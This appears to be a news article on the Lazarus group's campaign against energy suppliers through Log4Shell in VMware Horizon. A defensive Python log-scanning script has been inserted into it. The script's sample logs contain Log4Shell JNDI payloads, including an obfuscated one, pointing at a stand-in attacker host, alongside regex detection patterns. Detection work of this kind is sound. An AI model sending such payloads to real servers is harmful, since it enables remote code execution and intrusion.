Power suppliers from around the world, including the United States, Canada and Japan, have reportedly been the target of the state-sponsored North Korean hacker group Lazarus, also known as APT38.
According to Cisco Talos Intelligence Group, the campaign aims to infiltrate organizations worldwide in order to establish long-term access and then exfiltrate data of interest to the nation state.
While the exact targets remain unnamed, the attacks once again demonstrate the threat that North Korea and Lazarus can pose through destabilization efforts.
How did the attack work?
According to Talos, this campaign exploited vulnerabilities in VMware Horizon's virtual desktop product to gain an initial foothold in target organizations.
After successfully entering target corporate networks, the group deployed custom malware implants, including the VSingle and YamaBot implants.
In addition to these known malware families, Talos also reported discovering a previously unknown malware implant it calls "MagicRAT".
Initial access to organizations was reportedly gained using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework, that allows arbitrary code execution.
Cybersecurity company Tenable previously called Log4Shell “the biggest and most critical vulnerability ever.”
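The Log4Shell lookup string used for initial access lands in request logs on the exploited server, so one defensive check is to scan web-facing Horizon logs for it. The following is an added example, not code from the article or from Talos; the log lines are constructed, and the hostnames and addresses are placeholders.

```python
import re
from typing import List, Dict

# Constructed sample request log lines (not from the Talos report): benign
# requests to a VMware Horizon web endpoint plus two carrying the Log4Shell
# lookup string in the User-Agent field. Addresses and hostnames are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Apr/2022:10:01:02 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.9 - - [23/Apr/2022:10:01:05 +0000] "GET /broker/xml HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [23/Apr/2022:10:01:06 +0000] "GET /broker/xml HTTP/1.1" 200 "${${lower:j}ndi:rmi://attacker.example/b}"
203.0.113.12 - - [23/Apr/2022:10:02:30 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 "Mozilla/5.0 (X11)"
"""

# Log4j resolves lookups nested inside other lookups (${lower:j}, ${upper:N},
# ${::-j}, ${env:X:-j}) to a single character, so a naive match on "${jndi:"
# misses them. Fold such lookups to the character they resolve to before matching.
_NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}])\}|\$\{[^${}]*:-([^${}])\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """Collapse simple nested Log4j lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _NESTED_LOOKUP.sub(lambda m: m.group(1) or m.group(2), s)
        if new == s:
            break
        s = new
    return s

def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize_lookups(line)))

def find_probes(log_text: str) -> List[Dict[str, str]]:
    """Return the source address and raw line for every matching log entry."""
    hits = []
    for line in log_text.splitlines():
        if is_log4shell_probe(line):
            hits.append({"src": line.split()[0], "line": line})
    return hits

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(f"ALERT Log4Shell lookup from {hit['src']}: {hit['line']}")
```

A hit on a patched host is a probe worth correlating with outbound LDAP/RMI connections; a hit on an unpatched Horizon instance should be treated as a likely compromise.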
This would not be the first time North Korea has been involved in attacks against foreign powers; Kaspersky Lab security analysts linked North Korea to the WannaCry ransomware attack, which locked 300,000 computers in 150 countries and caused unprecedented problems in the British healthcare system.
Since its founding in 2010, the Lazarus group has certainly kept busy. More recently, it has turned its attention to the world of blockchains and DeFi.
Lazarus was linked to the $615 million attack on the Ronin sidechain, which powers the popular blockchain game Axie Infinity, in what is known to be one of the biggest DeFi hacks to date.